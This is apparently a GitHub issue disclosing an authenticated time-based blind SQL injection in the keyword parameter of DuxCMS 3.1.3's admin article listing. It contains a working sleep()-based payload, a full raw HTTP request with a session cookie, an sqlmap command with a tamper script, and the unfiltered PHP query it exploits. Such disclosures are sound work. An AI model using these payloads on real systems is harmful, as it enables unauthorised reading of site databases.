DuxCMS3 icon indicating copy to clipboard operation
DuxCMS3 copied to clipboard
verified publisher icon duxphp

Sql injection exists in DuxCMS3.1.3 background (time blind injection)

Open czheisenberg opened this issue 1 year ago • 0 comments

Preparatory work: Log in to the backend-get cookie. Vulnerability URL: http://127.0.0.1:8093/s/article/Content/index?class_id=&keyword= Vulnerability parameter: keyword payload: %27and(select*from(select+if(ascii(substr(database(),1,1))%3E97,sleep(1),0))a//union//select+1)=%27 If the injection is successful, the delay is more than one second, otherwise there is no delay. Image

Sqlmap authentication: Poc. Cookie is required.

GET http://127.0.0.1:8093/s/article/Content/index?class_id=&keyword=%27and%28select%2Afrom%28select%2Bsleep%283%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27 HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=jna2rl0d9ie3em6gb82s9odb3j
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1

python2 sqlmap.py -r 1.txt -p keyword -technique=T --tamper=space2comment --current-db

Image The name of the currently used database was successfully obtained. This vulnerability exists.

Vulnerability code:

Retrieving from the injection parameter: keyword can locate the call location. App/system/admin/SystemExtendAdmin.php. Line 42. Image There is a vulnerability in the query because it uses like for fuzzy matching and does not filter $value.

When entering: and (select*from (select sleep (3)) a//union//select 1) = Image

As shown in the figure above: the $value parameter is obtained from line 29$ pageParams = request (); request request, and then line 32 decodes $pageParams [$key] with urldecode () to get our malicious sql statement. There are no defenses. So the payload is spliced directly.

Image

After execution, the complete sql statement is: (A.title like'% and (select*from (select sleep (3)) a//union//select 1) =%')

czheisenberg avatar Jun 05 '24 13:06 czheisenberg